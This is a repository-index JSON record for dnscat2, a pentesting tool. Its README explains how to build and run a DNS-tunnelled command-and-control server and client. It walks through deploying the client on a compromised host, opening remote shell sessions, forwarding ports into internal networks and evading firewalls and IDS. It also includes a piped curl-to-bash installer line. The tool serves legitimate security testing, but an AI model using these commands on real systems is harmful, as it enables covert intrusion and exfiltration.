{"id":13454464,"url":"https://github.com/iagox86/dnscat2","last_synced_at":"2025-05-14T17:10:03.775Z","repository":{"id":6217572,"uuid":"7448868","full_name":"iagox86/dnscat2","owner":"iagox86","description":null,"archived":false,"fork":false,"pushed_at":"2024-03-14T11:17:49.000Z","size":3916,"stargazers_count":3556,"open_issues_count":98,"forks_count":616,"subscribers_count":138,"default_branch":"master","last_synced_at":"2025-04-11T10:00:16.593Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/iagox86.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2013-01-04T23:15:55.000Z","updated_at":"2025-04-11T06:40:06.000Z","dependencies_parsed_at":"2022-07-12T15:03:06.236Z","dependency_job_id":"fa95d1b3-d5c4-4ad7-ae9b-4fe151599493","html_url":"https://github.com/iagox86/dnscat2","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iagox86%2Fdnscat2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iagox86%2Fdnscat2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iagox86%2Fdnscat2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iagox86%2Fdnscat2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/iagox86","download_url":"https://codeload.github.com/iagox86/dnscat2/tar.gz/refs/heads/master","host":{"name":"GitHub"
,"url":"https://github.com","kind":"github","repositories_count":254190395,"owners_count":22029632,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T08:00:54.336Z","updated_at":"2025-05-14T17:10:03.750Z","avatar_url":"https://github.com/iagox86.png","language":"PHP","readme":"***** NOTE: The password for the .zip downloads are all \"password\"! *****\n\n# Introduction\n\nWelcome to dnscat2, a DNS tunnel that WON'T make you sick and kill you!\n\nThis tool is designed to create an encrypted command-and-control (C\u0026C)\nchannel over the DNS protocol, which is an effective tunnel out of\nalmost every network.\n\nThis README file should contain everything you need to get up and\nrunning! If you're interested in digging deeper into the protocol, how\nthe code is structured, future plans, or other esoteric stuff, check\nout the doc/ folder.\n\n# License\n\nThis is released under the BSD license. See [LICENSE.md](LICENSE.md) for\nmore information.\n\n# Overview\n\ndnscat2 comes in two parts: the client and the server.\n\nThe client is designed to be run on a compromised machine. It's written\nin C and has the minimum possible dependencies. It should run just about\nanywhere (if you find a system where it doesn't compile or run, please\nfile a ticket, particularly if you can help me get access to said\nsystem).\n\nWhen you run the client, you typically specify a domain name. 
All\nrequests will be sent to the local DNS server, which are then redirected\nto the authoritative DNS server for that domain (which you, presumably,\nhave control of).\n\nIf you don't have an authoritative DNS server, you can also use direct\nconnections on UDP/53 (or whatever you choose). They'll be faster, and\nstill look like DNS traffic to the casual viewer, but it's much more\nobvious in a packet log (all domains are prefixed with \"dnscat.\", unless\nyou hack the source). This mode will frequently be blocked by firewalls.\n\nThe server is designed to be run on an [authoritative DNS\nserver](doc/authoritative_dns_setup.md). It's in ruby, and depends on\nseveral different gems. When you run it, much like the client, you\nspecify which domain(s) it should listen for in addition to listening\nfor messages sent directly to it on UDP/53. When it receives traffic for\none of those domains, it attempts to establish a logical connection.  If\nit receives other traffic, it ignores it by default, but can also\nforward it upstream.\n\nDetailed instructions for both parts are below.\n\n# How is this different from .....\n\ndnscat2 strives to be different from other DNS tunneling protocols by\nbeing designed for a special purpose: command and control.\n\nThis isn't designed to get you off a hotel network, or to get free\nInternet on a plane. And it doesn't just tunnel TCP.\n\nIt can tunnel any data, with no protocol attached. Which means it can\nupload and download files, it can run a shell, and it can do those\nthings well. It can also potentially tunnel TCP, but that's only going\nto be added in the context of a pen-testing tool (that is, tunneling TCP\ninto a network), not as a general purpose tunneling tool. That's been\ndone, it's not interesting (to me).\n\nIt's also encrypted by default. 
I don't believe any other public DNS\ntunnel encrypts all traffic!\n\n# Where to get it\n\nHere are some important links:\n\n* [Sourcecode on Github](https://github.com/iagox86/dnscat2)\n* [Downloads](https://downloads.skullsecurity.org/dnscat2/) (you'll find [signed](https://downloads.skullsecurity.org/ron.pgp) Linux 32-bit, Linux 64-bit, Win32, and source code versions of the client, plus an archive of the server - keep in mind that that signature file is hosted on the same server as the files, so if you're worried, please verify my PGP key :) )\n* [User documentation](/doc/README.md) A collection of files, both for end-users (like the [Changelog](doc/changelog.md)) and for developers (like the [Contributing](/doc/contributing.md) doc)\n* [Issue tracker](https://github.com/iagox86/dnscat2/issues) (you can also email me issues, just put my first name (ron) in front of my domain name (skullsecurity.net))\n\n# How to play\n\nThe theory behind dnscat2 is simple: it creates a tunnel over the DNS\nprotocol.\n\nWhy? Because DNS has an amazing property: it'll make its way from server\nto server until it figures out where it's supposed to go.\n\nThat means that for dnscat to get traffic off a secure network, it\nsimply has to send messages to *a* DNS server, which will happily\nforward things through the DNS network until it gets to *your* DNS\nserver.\n\nThat, of course, assumes you have access to an authoritative DNS server.\ndnscat2 also supports \"direct\" connections - that is, running a dnscat\nclient that directly connects to your dnscat on your ip address and UDP\nport 53 (by default). 
The traffic still looks like DNS traffic, and\nmight get past dumber IDS/IPS systems, but is still likely to be stopped\nby firewalls.\n\nIf you aren't clear on how to set up an authoritative DNS server, it's\nsomething you have to set up with a domain provider.\n[izhan](https://github.com/izhan) helpfully [wrote\none](https://github.com/iagox86/dnscat2/blob/master/doc/authoritative_dns_setup.md)\nfor you!\n\n## Compiling\n\n### Client\n\nCompiling the client should be pretty straightforward - all you should\nneed to compile is make/gcc (for Linux) or either Cygwin or Microsoft\nVisual Studio (for Windows). Here are the commands on Linux:\n\n    $ git clone https://github.com/iagox86/dnscat2.git\n    $ cd dnscat2/client/\n    $ make\n\nOn Windows, load client/win32/dnscat2.vcproj into Visual Studio and hit\n\"build\". I created and tested it on Visual Studio 2008 - until I get a\nfree legit copy of a newer version, I'll likely be sticking with that\none. :)\n\nIf compilation fails, please file a bug on my [github\npage](https://github.com/iagox86/dnscat2/issues)! Please send details\nabout your system.\n\nYou can verify dnscat2 is successfully compiled by running it with no\nflags; you'll see it attempting to start a DNS tunnel with whatever your\nconfigured DNS server is (which will fail):\n\n    $ ./dnscat\n    Starting DNS driver without a domain! This will only work if you\n    are directly connecting to the dnscat2 server.\n    \n    You'll need to use --dns server=\u003cserver\u003e if you aren't.\n    \n    ** WARNING!\n    *\n    * It looks like you're running dnscat2 with the system DNS server,\n    * and no domain name!*\n    * That's cool, I'm not going to stop you, but the odds are really,\n    * really high that this won't work. 
You either need to provide a\n    * domain to use DNS resolution (requires an authoritative server):\n    *\n    *     dnscat mydomain.com\n    *\n    * Or you have to provide a server to connect directly to:\n    *\n    *     dnscat --dns=server=1.2.3.4,port=53\n    *\n    * I'm going to let this keep running, but once again, this likely\n    * isn't what you want!\n    *\n    ** WARNING!\n    \n    Creating DNS driver:\n     domain = (null)\n     host   = 0.0.0.0\n     port   = 53\n     type   = TXT,CNAME,MX\n     server = 4.2.2.1\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n    [[ ERROR ]] :: The server hasn't returned a valid response in the last 10 attempts.. closing session.\n    [[ FATAL ]] :: There are no active sessions left! Goodbye!\n    [[ WARNING ]] :: Terminating\n\n### Server\n\nThe server isn't \"compiled\", as such, but it does require some Ruby\ndependencies. Unfortunately, Ruby dependencies can be annoying to get\nworking, so good luck! If any Ruby experts out there want to help make\nthis section better, I'd be grateful!\n\nI'm assuming you have Ruby and Gem installed and in working order. 
If\nthey aren't, install them with either `apt-get`, `emerge`, `rvm`, or\nhowever is normal on your operating system.\n\nOnce Ruby/Gem are sorted out, run these commands (note: you can\nobviously skip the `git clone` command if you already installed the\nclient and skip `gem install bundler` if you've already installed\nbundler):\n\n    $ git clone https://github.com/iagox86/dnscat2.git\n    $ cd dnscat2/server/\n    $ gem install bundler\n    $ bundle install\n\nIf you get a permissions error with `gem install bundler` or `bundle\ninstall`, you may need to run them as root. If you have a lot of\nproblems, uninstall Ruby/Gem and install everything using `rvm` and\nwithout root.\n\nIf you get an error that looks like this:\n\n    /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': cannot load such file -- mkmf (LoadError)\n\nIt means you need to install the -dev version of Ruby:\n\n    $ sudo apt-get install ruby-dev\n\nI find that `sudo` isn't always enough to get everything working right,\nI sometimes have to switch to root and work directly as that account.\n`rvmsudo` doesn't help, because it breaks ctrl-z.\n\nYou can verify the server is working by running it with no flags and\nseeing if you get a dnscat2\u003e prompt:\n\n    # ruby ./dnscat2.rb\n\n    New window created: 0\n    Welcome to dnscat2! Some documentation may be out of date.\n\n    passthrough =\u003e disabled\n    auto_attach =\u003e false\n    auto_command =\u003e\n    process =\u003e\n    history_size (for new windows) =\u003e 1000\n    New window created: dns1\n    Starting Dnscat2 DNS server on 0.0.0.0:53\n    [domains = n/a]...\n\n    It looks like you didn't give me any domains to recognize!\n    That's cool, though, you can still use direct queries,\n    although those are less stealthy.\n\n    To talk directly to the server without a domain name, run:\n      ./dnscat2 --dns server=x.x.x.x,port=53\n\n    Of course, you have to figure out \u003cserver\u003e yourself! 
Clients\n    will connect directly on UDP port 53.\n\n    dnscat2\u003e\n\nIf you don't run it as root, you might have trouble listening on UDP/53\n(you can use --dnsport to change it). You'll see an error message if\nthat's the case.\n\n#### Ruby as root\n\nIf you're having trouble running Ruby as root, this is what I do to run\nit the first time:\n\n    $ cd dnscat2/server\n    $ su\n    # gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3\n    # \\curl -sSL https://get.rvm.io | bash\n    # source /etc/profile.d/rvm.sh\n    # rvm install 1.9\n    # rvm use 1.9\n    # bundle install\n    # ruby ./dnscat2.rb\n\nAnd subsequent times:\n\n    $ cd dnscat2/server\n    $ su\n    # source /etc/profile.d/rvm.sh\n    # ruby ./dnscat2.rb\n\n`rvmsudo` should make it easier, but dnscat2 doesn't play well with\n`rvmsudo` unfortunately.\n\n\n## Usage\n\n### Client + server\n\nBefore we talk about how to specifically use the tools, let's talk about\nhow dnscat is structured. The dnscat tool is divided into two pieces: a\nclient and a server. As you noticed if you went through the compilation,\nthe client is written in C and the server is in Ruby.\n\nGenerally, the server is run first. It can be long lived, and handle as\nmany clients as you'd like. As I said before, it's basically a C\u0026C\nservice.\n\nLater, a client is run, which opens a session with the server (more on\nsessions below). The session can either traverse the DNS hierarchy\n(recommended, but more complex) or connect directly to the server.\nTraversing the DNS hierarchy requires an authoritative domain, but will\nbypass most firewalls. 
Connecting directly to the server is more\nobvious for several reasons.\n\nBy default, connections are automatically encrypted (turn it off on the\nclient with `--no-encryption` and on the server with `--security=open`).\nWhen establishing a new connection, if you're paranoid about\nman-in-the-middle attacks, you have two options for verifying the peer:\n\n* Pass a pre-shared secret using the `--secret` argument on both sides\n  to validate the connection\n* Manually verify the \"short authentication string\" - a series of words\n  that are printed on both the client and server after encryption is\n  negotiated\n\n### Running a server\n\nThe server - which is typically run on the authoritative DNS server for\na particular domain - is designed to be feature-ful, interactive, and\nuser friendly. It's written in Ruby, and much of its design is inspired\nby Metasploit and Meterpreter.\n\nIf you followed the compilation instructions above, you should be able\nto just run the server:\n\n    $ ruby ./dnscat2.rb skullseclabs.org\n\nWhere \"skullseclabs.org\" is your own domain. If you don't have an\nauthoritative DNS server, it isn't mandatory; but this tool works way,\nway better with an authoritative server.\n\nThat should actually be all you need! Other than that, you can test it\nusing the client's --ping command on any other system, which should be\navailable if you've compiled it:\n\n    $ ./dnscat --ping skullseclabs.org\n\nIf the ping succeeds, your C\u0026C server is probably good! If you ran the\nDNS server on a different port, or if you need to use a custom DNS\nresolver, you can use the --dns flag in addition to --ping:\n\n    $ ./dnscat --dns server=8.8.8.8,domain=skullseclabs.org --ping\n\n    $ ./dnscat --dns port=53531,server=localhost,domain=skullseclabs.org --ping\n\nNote that when you specify a --dns argument, the domain has to be part\nof that argument (as domain=xxx). 
You can't just pass it on the\ncommandline (due to a limitation of my command parsing; I'll likely\nimprove that in a future release).\n\nWhen the process is running, you can start a new server using basically\nthe exact same syntax:\n\n    dnscat2\u003e start --dns=port=53532,domain=skullseclabs.org,domain=test.com\n    New window created: dns2\n    Starting Dnscat2 DNS server on 0.0.0.0:53532\n    [domains = skullseclabs.org, test.com]...\n    \n    Assuming you have an authoritative DNS server, you can run\n    the client anywhere with the following:\n      ./dnscat2 skullseclabs.org\n      ./dnscat2 test.com\n    \n    To talk directly to the server without a domain name, run:\n      ./dnscat2 --dns server=x.x.x.x,port=53532\n    \n    Of course, you have to figure out \u003cserver\u003e yourself! Clients\n    will connect directly on UDP port 53532.\n\nYou can run as many DNS listeners as you want, as long as they're on\ndifferent hosts/ports. Once the data comes in, the rest of the process\ndoesn't even know which listener data came from; in fact, a client can\nsend different packets to different ports, and the session will continue\nas expected.\n\n### Running a client\n\nThe client - which is typically run on a system after compromising it -\nis designed to be simple, stable, and portable. It's written in C and\nhas as few library dependencies as possible, and compiles/runs natively\non Linux, Windows, Cygwin, FreeBSD, and Mac OS X.\n\nThe client is given the domain name on the commandline, for example:\n\n    ./dnscat2 skullseclabs.org\n\nIn that example, it will create a C\u0026C session with the dnscat2 server\nrunning on skullseclabs.org. 
If an authoritative domain isn't an option,\nit can be given a specific IP address to connect to instead:\n\n    ./dnscat2 --dns host=206.220.196.59,port=5353\n\nAssuming there's a dnscat2 server running on that host/port, it'll\ncreate a session there.\n\n### Tunnels\n\nYo dawg; I hear you like tunnels, so now you can tunnel a tunnel through\nyour tunnel!\n\nIt is currently possible to tunnel a connection through dnscat2, similar\nto \"ssh -L\"! Other modes (\"ssh -D\" and \"ssh -R\") are coming soon as\nwell!\n\nAfter a session has started (a command session), the command \"listen\" is\nused to open a new tunnelled port. The syntax is roughly the same as ssh\n-L:\n\n    listen [lhost:]lport rhost:rport\n\nThe local host is optional, and will default to all interfaces (0.0.0.0).\nThe local port and remote host/port are mandatory.\n\nThe dnscat2 server will listen on lport. All connections received to\nthat port are forwarded, via the dnscat2 client, to the remote host/port\nchosen.\n\nFor example, this will listen on port 4444 (on the *server*) and forward\ntraffic to google:\n\n    listen 4444 www.google.com:80\n\nThen, if you connect to http://localhost:4444, it'll come out the\ndnscat2 client and connect to google.com.\n\nLet's say you're using this on a pentest and you want to forward ssh\nconnections through the dnscat2 client (running on somebody's corp\nnetwork) to an internal device. You can!\n\n    listen 127.0.0.1:2222 10.10.10.10:22\n\nThat'll only listen on the localhost interface on the dnscat2 server,\nand will forward connections via the tunnel to port 22 of 10.10.10.10.\n\n### Encryption\n\ndnscat2 is encrypted by default.\n\nI'm not a cryptographer, and by necessity I came up with the encryption\nscheme myself. As a result, I wouldn't trust this 100%. I think I did a\n*pretty* good job preventing attacks, but this hasn't been\nprofessionally audited. 
Use with caution.\n\nThere is a ton of technical information about the encryption in the\n[protocol doc](/doc/protocol.md). But here are the basics.\n\nBy default, both the client and the server support and will attempt\nencryption. Each connection uses a new keypair, negotiated by ECDH. All\nencryption is done by salsa20, and signatures use sha3.\n\nEncryption can be disabled on the client by passing `--no-encryption` on\nthe commandline, or by compiling it using `make nocrypto`.\n\nThe server will reject unencrypted connections by default. To allow\nunencrypted connections, pass `--security=open` to the server, or run\n`set security=open` on the console.\n\nBy default, there's no protection against man-in-the-middle attacks.  As\nmentioned before, there are two different ways to gain MitM protection:\na pre-shared secret or a \"short authentication string\".\n\nA pre-shared secret is passed on the commandline to both the client and\nthe server, and is used to authenticate both the client to the server\nand the server to the client. It should be a somewhat strong value -\nsomething that can't be quickly guessed by an attacker (there's only a\nshort window for the attacker to guess it, so it only has to hold up for\na few seconds).\n\nThe pre-shared secret is passed in via the `--secret` parameter on both\nthe client and the server. The server can change it at runtime using\n`set secret=\u003cnew value\u003e`, but that can have unexpected results if active\nclients are connected.\n\nFurthermore, the server can enforce *only* authenticated connections are\nallowed by using `--security=authenticated` or `set\nsecurity=authenticated`. That's enabled by default if you pass the\n`--secret` parameter.\n\nIf you don't require the extra effort of authenticating connections,\nthen a \"short authentication string\" is displayed by both the client and\nthe server. 
The short authentication string is a series of English words\nthat are derived based on the secret values that both sides share.\n\nIf the same set of English words are printed on both the client and the server,\nthe connection can be reasonably considered to be secure.\n\nThat's about all you need to know about the encryption! See the protocol\ndoc for details! I'd love to hear any feedback on the crypto, as well.\n:)\n\nAnd finally, if you have any problems with the crypto, please let me\nknow! By default a window called \"crypto-debug\" will be created at the\nstart. If you have encryption problems, please send me that log! Or,\nbetter yet, run dnscat2 with the `--firehose` and `--packet-trace`\narguments, and send me *EVERYTHING*! Don't worry about revealing private\nkeys; they're only used for that one session.\n\n### dnscat2's Windows\n\nThe dnscat2 UI is made up of a bunch of windows. The default window is\ncalled the 'main' window. You can get a list of windows by typing\n`windows` (or `sessions`) into any command prompt:\n\n    dnscat2\u003e windows\n    0 :: main [active]\n      dns1 :: DNS Driver running on 0.0.0.0:53 domains = skullseclabs.org [*]\n\nYou'll note that there are two windows - window `0` is the main window,\nand window `dns1` is the listener (technically referred to as the\n'tunnel driver').\n\nFrom any window that accepts commands (`main` and command sessions), you\ncan type `help` to get a list of commands:\n\n    dnscat2\u003e help\n    \n    Here is a list of commands (use -h on any of them for additional help):\n    * echo\n    * help\n    * kill\n    * quit\n    * set\n    * start\n    * stop\n    * tunnels\n    * unset\n    * window\n    * windows\n\nFor any of those commands, you can use -h or --help to get details:\n\n    dnscat2\u003e window --help\n    Error: The user requested help\n    \n    Interact with a window\n      -i, --i=\u003cs\u003e    Interact with the chosen window\n      -h, --help     Show this message\n\nWe'll 
use the `window` command to interact with `dns1`, which is a\nstatus window:\n\n    dnscat2\u003e window -i dns1\n    New window created: dns1\n    Starting Dnscat2 DNS server on 0.0.0.0:53531\n    [domains = skullseclabs.org]...\n    \n    Assuming you have an authoritative DNS server, you can run\n    the client anywhere with the following:\n      ./dnscat2 skullseclabs.org\n    \n    To talk directly to the server without a domain name, run:\n      ./dnscat2 --dns server=x.x.x.x,port=53531\n    \n    Of course, you have to figure out \u003cserver\u003e yourself! Clients\n    will connect directly on UDP port 53531.\n    \n    Received:  dnscat.9fa0ff178f72686d6c716c6376697968657a6d716800 (TXT)\n    Sending:  9fa0ff178f72686d6c716c6376697968657a6d716800\n    Received:  d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org (MX)\n    Sending:  d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org\n\nThe received and sent strings there are, if you decode them, pings.\n\nYou can switch to the 'parent' window (in this case, `main`) by pressing\nctrl-z. If ctrl-z kills the process, then you probably have to find a\nbetter way to run it (`rvmsudo` doesn't work, see above).\n\nWhen a new client connects and creates a session, you'll be notified in\n`main` (and certain other windows):\n\n    New window created: 1\n    dnscat2\u003e\n\n(Note that you have to press enter to get the prompt back)\n\nYou can switch to the new window the same way we switched to the `dns1`\nstatus window:\n\n    dnscat2\u003e window -i 1\n    New window created: 1\n    history_size (session) =\u003e 1000\n    This is a command session!\n    \n    That means you can enter a dnscat2 command such as\n    'ping'! 
For a full list of clients, try 'help'.\n    \n    command session (ubuntu-64) 1\u003e\n\nCommand sessions can spawn additional sessions; for example, the `shell`\ncommand:\n\n    command session (ubuntu-64) 1\u003e shell\n    Sent request to execute a shell\n    New window created: 2\n    Shell session created!\n\n    command session (ubuntu-64) 1\u003e\n\n(Note that throughout this document I'm cleaning up the output; usually\nyou have to press enter to get the prompt back)\n\nThen, if you return to the main session (ctrl-z or `suspend`), you'll see\nit in the list of windows:\n\n    dnscat2\u003e windows\n    0 :: main [active]\n      dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]\n      1 :: command session (ubuntu-64)\n      2 :: sh (ubuntu-64) [*]\n\nUnfortunately, the 'windows' command in a specific command session only\nshows child windows from that session, and right now new sessions aren't\nspawned as children.\n\nNote that some sessions have `[*]` - that means that there's been\nactivity since the last time we looked at them.\n\nWhen you interact with a session, the interface will look different\ndepending on the session type. As you saw with the default session type\n(command sessions) you get a UI just like the top-level session (you can\ntype 'help' or run commands or whatever). However, if you interact with\na 'shell' session, you won't see much immediately, until you type a\ncommand:\n\n    dnscat2\u003e windows\n    0 :: main [active]\n      dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]\n      1 :: command session (ubuntu-64)\n      2 :: sh (ubuntu-64) [*]\n    \n    dnscat2\u003e session -i 2\n    New window created: 2\n    history_size (session) =\u003e 1000\n    This is a console session!\n    \n    That means that anything you type will be sent as-is to the\n    client, and anything they type will be displayed as-is on the\n    screen! 
If the client is executing a command and you don't\n    see a prompt, try typing 'pwd' or something!\n    \n    To go back, type ctrl-z.\n    \n    sh (ubuntu-64) 2\u003e pwd\n    /home/ron/tools/dnscat2/client\n\nTo escape this, you can use ctrl-z or type \"exit\" (which will kill the\nsession).\n\nLastly, to kill a session, the `kill` command can be used:\n\n    dnscat2\u003e windows\n    0 :: main [active]\n      dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]\n      1 :: command session (ubuntu-64)\n      2 :: sh (ubuntu-64) [*]\n    dnscat2\u003e kill 2\n    Session 2 has been sent the kill signal!\n    Session 2 has been killed\n    dnscat2\u003e windows\n    0 :: main [active]\n      dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]\n      1 :: command session (ubuntu-64)\n\n# History\n\nIn the past, there were several DNS tunneling tools. One was called\n[dnscat](http://tadek.pietraszek.org/projects/DNScat/index.html), written by Tadek Pietraszek. The problem is, it's written in Java, and I really wanted something that could run basically everywhere.\n\nThat version of dnscat was based on a tool called NSTX, whose page [no\nlonger exists](http://freecode.com/projects/nstx/) and isn't even in the\nWayback Machine, so I know nothing about it.\n\nLater, I wrote a C implementation and called it dnscat (without\npermission), since the previous Java version was unmaintained and I\nreally liked the name (I toyed with calling it dnscat-ng, but -ng is a\nbit wordy for my taste). It worked, but there were a lot of problems.\nThe client and server were the same tool, like netcat, which, because\nDNS is such a client/server model, didn't work out that well. The other\nproblem was that I had linked it too much to the DNS protocol, so it\ncould only run over DNS.\n\ndnscat2 - the successor to dnscat - is an attempt to right some of the\nwrongs that I had committed.  
dnscat2 has a separate server (Ruby) and\nclient (C) and treats everything as a stream of bytes, and uses a\ndriver, of sorts, to convert that stream of bytes into dns requests and\nback. Thus, it's a layered protocol, with DNS being a lower layer.\n\nAs a result, I invented a protocol that I'm calling the dnscat protocol.\nYou can find documentation about it in docs/protocol.md. It's a simple\npolling network protocol, where the client occasionally polls the\nserver, and the server responds with a message (or an error code). The\nprotocol is designed to be resilient to the various issues I had with\ndnscat1 - that is, it can handle out-of-order packets, dropped packets,\nand duplicated packets equally well.\n","funding_links":[],"categories":["WELCOME","\u003ca id=\"7485e724ef5efd1daf9d672bd72fb595\"\u003e\u003c/a\u003eDNS协议","PHP","Exfiltration Tools","Forensics","C++","\u003ca id=\"1a9934198e37d6d06b881705b863afc8\"\u003e\u003c/a\u003e通信\u0026\u0026代理\u0026\u0026反向代理\u0026\u0026隧道","其他_安全与渗透","\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具","others","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具","Network Tools","Tools"],"sub_categories":["**Pentesting Tools**","\u003ca id=\"d70a62f77fa20a2219e81fa61527e644\"\u003e\u003c/a\u003e工具","Zealandia","\u003ca id=\"e996f5ff54050629de0d9d5e68fcb630\"\u003e\u003c/a\u003e隧道","网络服务_其他","\u003ca id=\"9d6789f22a280f5bb6491d1353b02384\"\u003e\u003c/a\u003e隧道\u0026\u0026穿透","\u003ca id=\"98a851c8e6744850efcb27b8e93dff73\"\u003e\u003c/a\u003eC\u0026C","Forensics","Exfiltration Tools","Open Source"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fiagox86%2Fdnscat2","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fiagox86%2Fdnscat2","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fiagox86%2Fdnscat2/lists"}